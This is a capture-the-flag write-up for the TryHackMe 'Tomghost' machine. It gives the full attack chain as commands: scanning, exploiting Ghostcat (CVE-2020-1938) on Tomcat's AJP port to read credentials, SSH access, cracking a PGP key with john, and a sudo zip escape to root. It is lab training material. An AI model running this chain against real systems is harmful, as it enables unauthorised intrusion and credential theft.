Tomghost THM

IP

10.10.11.196

Nmap initial

sudo nmap -sV -sC -A -oA nmap_intial 10.10.11.196

Nmap Full Scan

nmap -T4 -p- -oA nmap_full 10.10.11.196

  • nothing interesting

Ports

22:SSH

53:DNS

8009:AJP13 Apache Jserv

8080:HTTP Apache Tomcat 9.0.30

Port 8080 HTTP

When we navigate to port 8080 we are greeted with what looks like a default Apache Tomcat home page

Since we know the version let's see if we can hunt down an exploit.

seems that Apache tomcat version is vulnerable to CVE-2020-1938 Which is a file read/inclusion vulnerability found in the AJP connector (port 8009) in Apache Tomcat. A remote unauthenticated attacker could exploit this vulnerability and read the web application conf file. within instances where file upload is allowed, an attacker could upload malicious JavaServer Pages (JSP) code within a variety of file types and trigger this vulnerability to gain remote code execution (RCE).

we can use the following repo to exploit this vuln

LogoGitHub - Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-GhostcatGitHub

Within the repo we have CVE-2020-1938.py , to exploit Apache we can run the scripts against the server 

python2 CVE-2020-1938.py -p 8009 10.10.11.196

we can now read the web conf file, llooks like we have a user and password

skyfuck:8730281lkjlkjdqlksalks

Lets see if we can SSH in

ssh skyfuck@10.10.11.196

  • it works!!

Privilege escalation via skyfuck

id

  • nothin intersting

sudo privileges

  • nothin interesting

within skyfuck's home directory, we do find some interesting files

  • credential.pgp

  • tryhackme.asc

lets download the files and enumerate them further

download into the local host

scp skyfuck@10.10.69.186:/home/skyfuck/credential.pgp .
scp skyfuck@10.10.69.186:/home/skyfuck/tryhackme.asc .

What we can do is brute force the tryhackme.asc file, to do this we need to convert the file using gpg2john

gpg2john tryhackme.asc > hash.txt

Now we can brute force the hash and retrieve the password

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

we now have the password

alexandru

Now back to the remote host

we need to import the key and decrypt the PGP file

pgp --import tryhackme.asc
gpg --decrypt credentials.pgp

merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j

awesome we have Merlin's password let's change users to Merlin

su merlin

Privilege escalation via merlin

Lets check our sudo privileges

sudo -l

  • looks like we can run the zip command with no password with elevated privileges. we can check out GTFOBins 

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF

we are now root!

PreviousConvertMyVideo THMNextLazy Admin THM

Last updated